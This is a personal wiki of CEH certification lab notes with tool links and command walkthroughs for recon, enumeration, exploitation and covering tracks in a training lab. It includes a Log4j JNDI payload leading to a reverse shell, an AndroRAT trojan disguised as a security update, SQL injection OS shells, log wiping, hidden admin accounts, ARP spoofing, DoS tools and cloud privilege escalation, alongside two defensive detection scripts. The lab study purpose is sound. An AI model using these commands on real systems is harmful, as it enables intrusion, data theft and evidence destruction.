CEH - yenbohuang/techNotes GitHub Wiki

EC-Council Websites

URL Note
https://aspen.eccouncil.org/ Main portal for certificates, renewal, etc.
https://aspen.eccouncil.org/Verify Verify certificate by candidate name and certification number.
https://codered.eccouncil.org Online learning
https://cert.eccouncil.org/ece-policy.html ECE Policy
https://bookshelf.vitalsource.com Training manual
https://eccouncil.learnondemand.net/User/Register?OrganizationId=1133 iLab
https://www.eccexam.com/ Exam center
https://www.hackerverse.com/ Hackerverse is a global cybersecurity competition ecosystem designed by EC-Council to support and advance the cybersecurity community worldwide.

How to share the badge on LinkedIn?

Useful Websites

General

URL Note
http://www.certifiedhacker.com Target website for hacking practice.
https://osintframework.com/ Lists various OSINT tools arranged by category
https://www.exploit-db.com/ CVE compliant archive of public exploits and corresponding vulnerable software.
https://www.exploit-db.com/google-hacking-database Google hacking samples.
https://www.cve.org/ Identify, define, and catalog publicly disclosed cybersecurity vulnerabilities.
https://cwe.mitre.org/ Community-developed list of common software and hardware weaknesses.
https://nvd.nist.gov/ Security checklist references, security-related software flaws, product names, and impact metrics.
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator CVSS Calculator

Information Gathering

URL Note
https://www.netcraft.com Extract the company’s domains and sub-domains.
https://search.censys.io/?q= Gather target OS information through passive footprinting.
https://centralops.net Investigate domains and IP addresses, DNS records, traceroute, nslookup, whois searches, etc.
http://whois.domaintools.com Whois lookup
https://www.whois.com/whois/ Whois lookup
http://www.kloth.net/services/nslookup.php Gather DNS Information
https://www.shodan.io/ Search IoT devices.
https://mattw.io/youtube-metadata/ Collects singular details of a video, its uploader, playlist and its creator or channel.

System Hacking

URL Note
https://georgeom.net/StegOnline/upload An image steganography tool that hides data inside images.

Malware Threats

URL Note
https://www.virustotal.com Analyse suspicious files, domains, IPs and URLs to detect malware and other breaches, automatically share them with the security community.
https://www.hybrid-analysis.com Free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology.

Social Engineering

URL Note
https://www.phishtank.com/ PhishTank is a free community site on which anyone can submit, verify, track, and share phishing data.
https://ciso.eccouncil.org/phishing-solutions/ OhPhish is a phishing simulation tool that provides an organization with a platform to launch phishing simulation campaigns on its employees.

Hacking Mobile Platforms

URL Note
https://www.sisik.eu/apk-tool Sixo Online APK Analyzer allows you to analyze various details about Android APK files. It can decompile binary XML files and resources.

Cryptography

URL Note
https://www.rmail.com/free-trial/ RMail is an email security tool that provides open tracking, proof of delivery, email encryption, electronic signatures, large file transfer functionality, etc.

Using iLab

Parrot Security VM

  • We need to start Apache httpd for sharing/downloading/running malicious files on Windows:
sudo su
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp <malicious files> /var/www/html/share
service apache2 start
  • We need to connect to the Windows 11 shared folder for the malicious tools provided by the CEH training package:
    • Top menu bar -> Places -> Desktop -> Network.
    • Press Ctrl+L.
    • Location bar -> smb://10.10.1.11 (the IP address for Windows 11 VM).
    • Enter Windows username/password.

Information Gathering

Linux

Command Note
theHarvester -d microsoft.com -l 200 -b baidu theHarvester: Gathers names, emails, IPs, subdomains, and URLs by using multiple public resources.
python3 photon.py -u http://www.certifiedhacker.com -l 3 -t 200 --wayback photon.py: A fast and flexible crawler designed for open source intelligence (OSINT).
python3 grecon.py grecon.py: Automates the process of Google Based Recon AKA Google Dorking.
cewl -w wordlist.txt -d 2 -m 5 https://www.certifiedhacker.com cewl: Collect word list for password crackers.
./dnsrecon.py -r 162.241.216.0-162.241.216.255 dnsrecon.py: Reverse DNS operation is performed to obtain the domain name of a given IP address.
traceroute www.certifiedhacker.com Network tracerouting.
domainfy -n www.certifiedhacker.com -t all osrframework: Use domainfy to check with the existing domains using words and nicknames.
python3 billcipher.py BillCipher: Gather information such as DNS Lookup, Whois lookup, GeoIP Lookup, Subnet Lookup, Port Scanner, Page Links, Zone Transfer, HTTP Header, etc.

Windows

Command Note
tracert -h 5 www.certifiedhacker.com Network tracerouting.

Querying the DNS to obtain a domain name or IP address mapping or for any other specific DNS record.

nslookup

> set type=a
> www.certifiedhacker.com

> set type=cname
> certifiedhacker.com

> set type=a
> ns1.bluehost.com

Network Scanning

Command Note
unicornscan 10.10.1.22 -Iv unicornscan: Perform OS discovery on the target system.

sx scan command.

# Create ARP cache
sx arp 10.10.1.0/24 --json | tee arp.cache

# List all open ports
cat arp.cache | sx tcp -p 1-65535 10.10.1.11

# UDP scan (do not return any code -> port is open)
cat arp.cache | sx udp --json -p 53 10.10.1.11

Enumeration

Windows

Command Note
nbtstat -a 10.10.1.11 Displaying the NetBIOS name table of a remote computer.
nbtstat -c Displaying the contents of the NetBIOS name cache, the table of NetBIOS names, and their resolved IP addresses.
net use Connection status, shared folder/drive and network information.

DNS zone transfer:

nslookup
>> set querytype=soa
>> certifiedhacker.com
>> ls -d ns1.bluehost.com

Linux

Command Note
snmp-check 10.10.1.22 snmp-check: Listing sensitive information such as System information and User accounts.
snmpwalk -v2c -c public 10.10.1.22 snmpwalk: Display SNMP information (OIDs, server information, user credentials, etc.)
ldapsearch -h 10.10.1.22 -x -s base namingcontexts LDAP naming contexts.
ldapsearch -h 10.10.1.22 -x -b "DC=CEH,DC=com" More information about LDAP primary domain.
ldapsearch -x -h 10.10.1.22 -b "DC=CEH,DC=com" "objectclass=*" All LDAP objects.
echo "10.10.1.19" >> Target.txt; ./superenum SuperEnum: Enumerate NFS (taking roughly 15 - 20 minutes). Enter IP List filename with path -> Target.txt
python3 rpc-scan.py 10.10.1.19 --rpc RPCScan: Enumerate NFS.
./dnsrecon.py -d www.certifiedhacker.com DNSRecon: Enumerate DNS records.

enum4linux scan command.

Command Note
enum4linux -u <user> -p <password> -n 10.10.1.22 NetBIOS information.
enum4linux -u <user> -p <password> -U 10.10.1.22 User list.
enum4linux -u <user> -p <password> -o 10.10.1.22 OS information.
enum4linux -u <user> -p <password> -P 10.10.1.22 Password policy information.
enum4linux -u <user> -p <password> -G 10.10.1.22 Group and member list.
enum4linux -u <user> -p <password> -S 10.10.1.22 Share policy information.

Enumerate LDAP using Python ldap3:

python3
>>> import ldap3
>>> server = ldap3.Server('10.10.1.22', get_info=ldap3.ALL, port=389)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
>>> server.info
>>> connection.search(search_base='DC=CEH,DC=com', search_filter='(&(objectclass=*))', search_scope='SUBTREE', attributes='*')
>>> connection.entries
>>> connection.search(search_base='DC=CEH,DC=com', search_filter='(&(objectclass=person))', search_scope='SUBTREE', attributes='userpassword')
>>> connection.entries
>>> exit()

DNS zone transfer:

dig ns www.certifiedhacker.com
dig @ns1.bluehost.com www.certifiedhacker.com axfr

Vulnerability Analysis

nikto: web server scanner

nikto -h https://www.certifiedhacker.com -Tuning x
nikto -h https://www.certifiedhacker.com -Cgidirs all
nikto -h https://www.certifiedhacker.com -o Nikto_Scan_Results -F txt

System Hacking

Linux

Command Note
nc -nvlp 4444 Listen on port 4444.
tcpdump -nvvx port 8888 -i lo Do tcpdump on port 8888.
# start responder
sudo responder -I eth0

# Wait for Windows user to connect by shared folder.
# Copy hash value into "hash.txt"
# Run John the Ripper and crack password.

john hash.txt

Covert Channels using Covert_TCP

General step: compile covert_tcp

# Connect to Windows 11 by "smb://10.10.1.11"
# Download from "CEH-Tools\CEHv12 Module 06 System Hacking\Covering Tracks Tools\Covert_TCP\covert_tcp.c"
cc -o covert_tcp covert_tcp.c

In Ubuntu

  • Messages will not be monitored by tcpdump, but they are visible in Wireshark.
# Run as "ubuntu"
mkdir ~/Desktop/Receive
cd ~/Desktop/Receive

# Compile "covert_tcp" and run the following commands.
sudo su
./covert_tcp -dest 10.10.1.9 -source 10.10.1.13 -source_port 9999 -dest_port 8888 -server -file /home/ubuntu/Desktop/Receive/receive.txt

In Parrot Security

# Run as "attacker".
mkdir ~/Desktop/Send
cd ~/Desktop/Send
echo "Secret Message" > message.txt

# Compile "covert_tcp" and run the following commands.
sudo su
./covert_tcp -dest 10.10.1.9 -source 10.10.1.13 -source_port 8888 -dest_port 9999 -file /home/attacker/Desktop/Send/message.txt

Clear Linux Machine Logs using the BASH Shell

Command Description
export HISTSIZE=0 Disable bash history.
history -c Clear the stored history
history -w Delete the history of the "current shell".
shred ~/.bash_history Shred the history file, making its content unreadable.

Clear logs in one line:

shred ~/.bash_history && cat /dev/null > ~/.bash_history && history -c && exit

Windows

Hide Files using NTFS Streams

# Hide "calc.exe" in "readme.txt"
type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe
del c:\magic\calc.exe

# Create a symbolic link to "calc.exe"
mklink backdoor.exe readme.txt:calc.exe
backdoor.exe

Hide Data using White Space Steganography

snow -C -m "My swiss bank account number is 45656684512263" -p "magic" readme.txt readme2.txt
snow -C -p "magic" readme2.txt

Clear Logs to Hide the Evidence of Compromise

View, Enable, and Clear Audit Policies using Auditpol (Run as Administrator)

Command Description
auditpol /get /category:* View all the audit policies.
auditpol /set /category:"system","account logon" /success:enable /failure:enable Enable the audit policies.
auditpol /clear /y Clear the audit policies.

Wipe out the logs of the target system (Run as administrator):

E:\CEH-Tools\CEHv12 Module 06 System Hacking\Covering Tracks Tools\Clear_Event_Viewer_Logs.bat\Clear_Event_Viewer_Logs.bat

Using wevtutil:

Command Description
wevtutil el Lists event log names.
wevtutil cl [log_name] Clear a specific event log (e.g., system, application, and security).

Securely delete data by overwriting it to prevent recovery.

cipher /w:[Drive or Folder or File Location]

Hiding Artifacts

Hide/unhide file or folder:

attrib +h +s +r <folder or file>
attrib -s -h -r <folder or file>

Hide user accounts:

net user <username> /add
net user <username> /active:yes
net user <username> /active:no

Sniffing

Command Description
macof -i eth0 -n 10 Flooding the CAM table with random MAC addresses.
yersinia -I Yersinia is a network tool designed to take advantage of weaknesses in different network protocols such as DHCP. E.g., DHCP Starvation Attack: Press F2 -> x -> 1.
arpspoof -i eth0 -t <target> <host> Attackers use the arpspoof tool to obtain the ARP cache; then, the MAC address is replaced with that of an attacker’s system. Therefore, any traffic flowing from the victim to the gateway will be redirected to the attacker’s system.
habu.arp.poison 10.10.1.11 10.10.1.13 Sends ARP 'is-at' packets to the specified victim(s), poisoning their ARP tables to send their traffic to the attacker system.

Spoof a MAC Address of Linux Machine using macchanger

ifconfig eth0 down

# Print MAC address
macchanger -s eth0

# Set a random vendor MAC address
macchanger -a eth0

# Set a random MAC address
macchanger -r eth0

ifconfig eth0 up
ifconfig

Denial-of-Service

Perform a DoS Attack using Raven-storm (Layer 4 module).

sudo rst
l4

ip 10.10.1.19
port 80
threads 20000
run

<ctrl+z>

Session Hijacking

Intercept HTTP Traffic using bettercap.

bettercap -h
bettercap -iface eth0
Option Description
help View the list of available modules.
net.probe on Send different types of probe packets to each IP in the current subnet for the net.recon module to detect them.
net.recon on Periodically reading the system ARP table to detect new hosts on the network.
set http.proxy.sslstrip true Enables SSL stripping.
set arp.spoof.internal true Spoofs the local connections among computers of the internal network.
set arp.spoof.targets 10.10.1.11 Spoofs the IP address of the target host.
http.proxy on Initiates http proxy.
arp.spoof on Initiates ARP spoofing.
net.sniff on Performing sniffing on the network.
set net.sniff.regexp '.*password=.+' Only consider the packets sent with a payload matching the given regular expression.

Hacking Web Servers

Information Gathering using Ghost Eye

sudo su
cd /home/attacker/ghost_eye
pip3 install -r requirements.txt
python3 ghost_eye.py

Perform Web Server Reconnaissance using Skipfish

  • Start Wampserver64 (pre-installed) on Windows Server 2022.

  • Run skipfish on Parrot Security:

sudo su
skipfish -o /home/attacker/test -S /usr/share/skipfish/dictionaries/complete.wl http://10.10.1.22:8080

# Run for 5 minutes and exit by ctrl+c.
# Check files under /home/attacker/test/

Footprint a Web Server using Netcat and Telnet

  • By Netcat:
nc -vv www.moviescope.com 80

# Press "enter" twice after typing this line.
GET / HTTP/1.0

# Netcat will perform the banner grabbing and gather information
  • By Telnet:
telnet www.moviescope.com 80

# Press "enter" twice after typing this line.
GET / HTTP/1.0

# Telnet will perform the banner grabbing and gather information.

Uniscan Web Server Fingerprinting in Parrot Security

HTML reports are generated under /usr/share/uniscan/report.

Command Description
uniscan -u http://10.10.1.22:8080/CEH -q Search for the directories of the web server.
uniscan -u http://10.10.1.22:8080/CEH -we Enable the file check (robots.txt and sitemap.xml file).
uniscan -u http://10.10.1.22:8080/CEH -d Perform dynamic tests, obtaining more information about email IDs, source code disclosures, external hosts, and web backdoors.

Crack FTP Credentials using a Dictionary Attack

# Copy "/home/attacker/Desktop/CEHv12 Module 13 Hacking Web Servers/Wordlists" to "Desktop/Wordlists".
hydra -L /home/attacker/Desktop/Wordlists/Usernames.txt -P /home/attacker/Desktop/Wordlists/Passwords.txt ftp://10.10.1.11

Hacking Web Applications

Whois lookup

URL Note
https://www.netcraft.com Netcraft
https://www.tamos.com SmartWhois
https://whois.domaintools.com WHOIS Lookup
http://www.sabsoft.com Batch IP Converter

DNS interrogation

URL Note
https://github.com/darkoperator/dnsrecon DNSRecon
https://network-tools.com DNS Records
https://centralops.net Domain Dossier

Linux

Perform Web Application Reconnaissance using WhatWeb

Command Description
whatweb www.moviescope.com Website footprinting.
whatweb -v www.moviescope.com Verbosity scan.
whatweb --log-verbose=MovieScope_Report www.moviescope.com Export the results returned by WhatWeb as a text file.

Detect Load Balancers using Various Tools

Command Description
dig yahoo.com A single host resolves to multiple IP addresses, which possibly indicates that the host is using a load balancer.
lbd yahoo.com lbd (load balancing detector) detects if a given domain uses DNS and http load balancing via the Server: and Date: headers and the differences between server answers.

Identify Web Server Directories using Various Tools

Gobuster is a command-oriented tool used to brute-force URIs in websites, DNS subdomains, and names of the virtual hosts on the target server.

# copy wordlist file (used for directory brute-forcing) to Desktop
cp /home/attacker/Desktop/CEHv12\ Module\ 14\ Hacking\ Web\ Applications/common.txt /home/attacker/Desktop/

gobuster dir -u www.moviescope.com -w /home/attacker/Desktop/common.txt

Using /home/attacker/dirsearch/dirsearch.py:

Command Description
python3 dirsearch.py -u http://www.moviescope.com Directory brute forcing.
python3 dirsearch.py -u http://www.moviescope.com -e aspx Lists all the files containing aspx extension.
python3 dirsearch.py -u http://www.moviescope.com -x 403 Lists the directories from the target website excluding 403 status code.

Identify a clickjacking vulnerability using ClickjackPoc:

cd /home/attacker/ClickjackPoc/
echo "http://www.moviescope.com" | tee domain.txt
python3 clickJackPoc.py -f domain.txt

Identify XSS Vulnerabilities in Web Applications using PwnXSS

cd /home/attacker/PwnXSS
python3 pwnxss.py -u http://testphp.vulnweb.com

Gain Access by Exploiting Log4j Vulnerability (CVE-2021-44228)

Run under Ubuntu:

sudo apt-get update
sudo apt-get install docker.io

cd /home/ubuntu/log4j-shell-poc/
docker build -t log4j-shell-poc .
docker run --network host log4j-shell-poc

Run under Parrot Security:

cd /home/attacker/log4j-shell-poc
  • Run in terminal 2 with root permission:
cd /home/attacker
tar -xf jdk-8u202-linux-x64.tar.gz
mv jdk1.8.0_202 /usr/bin/
  • Go back to Terminal 1 and edit poc.py.

    • Edit line 62
      • Replace jdk1.8.0_20/bin/javac with /usr/bin/jdk1.8.0_202/bin/javac.
    • Edit line 87
      • Replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java.
    • Edit line 99
      • Replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java.
  • Run in terminal 3 and initiate a netcat listener.

nc -lvp 9001
  • Run in terminal 1:
python3 poc.py --userip 10.10.1.13 --webport 8000 --lport 9001
  • Copy the payload generated in the send me section.

    • Send me: ${jndi:ldap://10.10.1.13:1389/a}
  • Visit http://10.10.1.9:8080

    • Copy ${jndi:ldap://10.10.1.13:1389/a} to username field and type password in password field.
  • Switch to the netcat listener (terminal 3); you can see that a reverse shell is opened.

    • Use pwd and whoami and check if the reverse shell works.
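
To see what this exercise leaves behind in logs, the following added example (not part of the original notes or of log4j-shell-poc) scans log lines for the JNDI lookup string used above and extracts the callback host and port. The log lines are constructed and the function names are illustrative.

```python
import re
from urllib.parse import unquote

# Literal form of the lookup used in this walkthrough:
#   ${jndi:<scheme>://<host>[:<port>][/<path>]}
# Matching is literal, so a clean scan proves nothing; the fix is upgrading
# Log4j, not filtering input.
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)"
    r"(?::(?P<port>\d+))?(?:/[^}\s]*)?\}",
    re.IGNORECASE,
)

# Constructed sample log lines (not captured from a real system).
SAMPLE_LOG = [
    "2024-01-01 10:00:01 INFO  Login attempt user=alice",
    "2024-01-01 10:00:07 INFO  Login attempt user=${jndi:ldap://10.10.1.13:1389/a}",
    '10.10.1.13 - - [01/Jan/2024:10:00:09 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F10.10.1.13%3A1389%2Fa%7D HTTP/1.1" 200 512',
    "2024-01-01 10:00:12 WARN  Config key ${env:HOME} not expanded",
]


def find_jndi_lookups(line):
    """Return unique (scheme, host, port) tuples found in one log line.

    The line is checked as written and after URL-decoding, because access
    logs record the request target percent-encoded.
    """
    hits = []
    for candidate in (line, unquote(line)):
        for m in JNDI_LOOKUP.finditer(candidate):
            port = int(m["port"]) if m["port"] else None
            hit = (m["scheme"].lower(), m["host"], port)
            if hit not in hits:
                hits.append(hit)
    return hits


def scan(lines):
    """Return (line_number, scheme, host, port) for every lookup found."""
    return [
        (number, *hit)
        for number, line in enumerate(lines, start=1)
        for hit in find_jndi_lookups(line)
    ]


def callback_endpoints(lines):
    """Hosts the lookups point at: candidates for egress blocking and for
    pivoting in network logs (a missing port stays None, it is not guessed)."""
    return sorted({(host, port) for _, _, host, port in scan(lines)}, key=str)


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("line %d: %s://%s:%s" % finding)
    print("callback endpoints:", callback_endpoints(SAMPLE_LOG))
```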

Windows

Command Description
whoami Displays the user, group, and privileges information for the user currently logged onto the Windows Server machine.
tasklist View the processes running on the machine.
Taskkill /PID <Process ID> /F Forcefully (/F) terminating the process.
net user List user accounts.
net user <account name> View user account information.
net user <account name> /Add Add a user account remotely.
net localgroup Administrators <account> /Add Grant admin privileges to the account. You can log in by RDP without a password.

SQL Injection

Windows

Useful MSSQL scripts:

SQL Description
exec master..xp_cmdshell 'ping www.certifiedhacker.com -l 65000 -t' Run command shell by SQL.

Linux

sqlmap

  • Visit http://www.moviescope.com/viewprofile.aspx?id=1
  • Copy cookie value by running document.cookie in Firefox dev toolbar.
Command Description
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value]" --dbs Enumerates databases.
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value]" -D moviescope --tables Enumerates tables in moviescope database.
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value]" -D moviescope -T User_Login --dump Dump all the User_Login table content.
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value]" --os-shell Prompt for an interactive OS shell.

Detect SQL Injection Vulnerabilities using Damn Small SQLi Scanner (DSSS)

  • Visit http://www.moviescope.com/viewprofile.aspx?id=1
  • Copy cookie value by running document.cookie in browser dev toolbar.
cd /home/attacker/DSSS
python3 dsss.py
python3 dsss.py -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value]"

Hacking Wireless Networks

aircrack-ng

Command Description
aircrack-ng '/home/attacker/Desktop/Sample Captures/WEPcrack-01.cap' Crack the WEP key.
aircrack-ng -a2 -b [Target BSSID] -w /home/attacker/Desktop/Wordlist/password.txt '/home/attacker/Desktop/Sample Captures/WPA2crack-01.cap' Crack WPA2 network.

Hacking Mobile Platforms

Harvest Users' Credentials using the Social-Engineer Toolkit

cd /home/attacker/social-engineer-toolkit
./setoolkit

Launch a DoS Attack on a Target machine using Low Orbit Ion Cannon (LOIC) on the Android Mobile Platform

  • Launch Cx File Explorer.
  • Click 10.10.1.11 from the Network tab and navigate to CEH-Tools --> CEHv12 Module 17 Hacking Mobile Platforms --> Android Hacking Tools --> Low Orbit Ion Cannon (LOIC).
  • Install Low Orbit Ion Cannon LOIC_v1.3.apk.

Exploit the Android Platform through Android Debug Bridge (ADB) using PhoneSploit

cd /home/attacker/PhoneSploit
python3 -m pip install colorama
python3 phonesploit.py

Hack an Android Device by Creating APK File using AndroRAT

cd /home/attacker/AndroRAT
python3 androRAT.py --build -i 10.10.1.13 -p 4444 -o SecurityUpdate.apk

# Share the APK by httpd, and install on Android by visiting http://10.10.1.13/share/
cp /home/attacker/AndroRAT/SecurityUpdate.apk /var/www/html/share/

python3 androRAT.py --shell -i 0.0.0.0 -p 4444

# After the APK is installed, we can run the following commands in androRAT shell.
help
deviceInfo
getSMS inbox
getMACAddress
exit

Cloud Computing

Enumerate S3 Buckets using lazys3

lazys3 is a Ruby script tool that is used to brute-force AWS S3 buckets using different permutations.

cd /home/attacker/lazys3-master/

# find the public S3 buckets
ruby lazys3.rb

# search the S3 buckets of specific company
ruby lazys3.rb <company name>

Enumerate S3 Buckets using S3Scanner

S3Scanner is a tool that finds the open S3 buckets and dumps their contents.

cd /home/attacker/S3Scanner/
pip3 install -r requirements.txt

# Displaying a list of public S3 buckets.
# "sites.txt" is a text file containing the target website URL that is scanned for open S3 buckets.
python3 ./s3scanner.py sites.txt

Exploit Open S3 Buckets using AWS CLI

cd /root
pip3 install awscli
aws --help
aws configure

# Assume the bucket name is "certifiedhacker02"
aws s3 ls s3://certifiedhacker02

echo "You have been hacked" >> Hack.txt
aws s3 mv Hack.txt s3://certifiedhacker02
aws s3 rm s3://certifiedhacker02/Hack.txt 

Escalate IAM User Privileges by Exploiting Misconfigured User Policy

cd /root
aws configure
vim user-policy.json
# {
#  "Version":"2012-10-17",
#  "Statement": [
#    { "Effect":"Allow", "Action":"*", "Resource":"*" }
#  ]
#}

aws iam create-policy --policy-name user-policy --policy-document file://user-policy.json

aws iam attach-user-policy --user-name <Target Username> --policy-arn arn:aws:iam::<Account ID>:policy/user-policy

aws iam list-attached-user-policies --user-name <Target Username>

aws s3api list-buckets --query "Buckets[].Name"
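aws iam list-user-policies --user-name <Target Username>
aws iam list-role-policies --role-name <Role Name>
aws iam list-group-policies --group-name <Group Name>
aws iam create-user --user-name <New Username>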
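
A defender-side check for the misconfiguration this section relies on, as an added example that is not part of the original notes: it flags policy documents that allow every action on every resource (like user-policy.json above) or that let a principal run the create-policy and attach-user-policy steps. The function names, finding labels and sample policies are constructed for illustration.

```python
import json
import re

# The two IAM actions the walkthrough above relies on: a user allowed to create
# a managed policy and attach it to a user can grant themselves anything.
ESCALATION_ACTIONS = ("iam:CreatePolicy", "iam:AttachUserPolicy")

# Constructed sample documents (not taken from a real account).
SAMPLE_POLICIES = {
    "user-policy": {  # same content as user-policy.json in the notes above
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
    },
    "helpdesk": {
        "Version": "2012-10-17",
        "Statement": [
            {"Effect": "Allow", "Action": ["iam:Get*", "iam:List*"], "Resource": "*"},
            {"Effect": "Allow", "Action": ["iam:Create*", "iam:attachuserpolicy"],
             "Resource": "*"},
        ],
    },
    "read-only-bucket": {
        "Version": "2012-10-17",
        "Statement": {"Effect": "Allow", "Action": "s3:GetObject",
                      "Resource": "arn:aws:s3:::example-bucket/*"},
    },
}


def as_list(value):
    """IAM accepts a single string or object wherever it accepts a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def pattern_matches(pattern, action):
    """IAM-style action match: '*' is any run, '?' one character, no case."""
    regex = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.fullmatch(regex, action, flags=re.IGNORECASE) is not None


def audit_policy(document):
    """Return sorted findings for one policy document (dict or JSON text)."""
    if isinstance(document, str):
        document = json.loads(document)
    findings = set()
    for stmt in as_list(document.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        if "*" not in as_list(stmt.get("Resource")):
            continue  # scoped resources need a finer review than this check
        if "NotAction" in stmt:
            # Allow + NotAction on "*" grants everything except the listed actions
            findings.add("allow-notaction-on-all-resources")
            continue
        patterns = as_list(stmt.get("Action"))
        if "*" in patterns:
            findings.add("full-admin")
            continue
        for action in ESCALATION_ACTIONS:
            if any(pattern_matches(p, action) for p in patterns):
                findings.add("escalation:" + action)
    return sorted(findings)


if __name__ == "__main__":
    for name, doc in SAMPLE_POLICIES.items():
        print(f"{name}: {', '.join(audit_policy(doc)) or 'no findings'}")
```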

Cryptography

Create and Use Self-signed Certificates

  • Open "Internet Information Services (IIS) Manager".
  • IIS -> Server Certificates -> Actions -> Create Self-Signed Certificate.
  • Expand "Sites" -> Edit Sites -> Bindings -> Add.
  • Refresh the site (e.g., GoodShopping) by right-click context menu.

Tools with many features that deserve a standalone page

Name Child Page
hping3 CEH_hping3
recon-ng CEH_recon_ng
nmap CEH_nmap
Metasploit CEH_Metasploit
Snort CEH_Snort
Useful Applications CEH_Useful_Applications
Hacking WordPress CEH_WordPress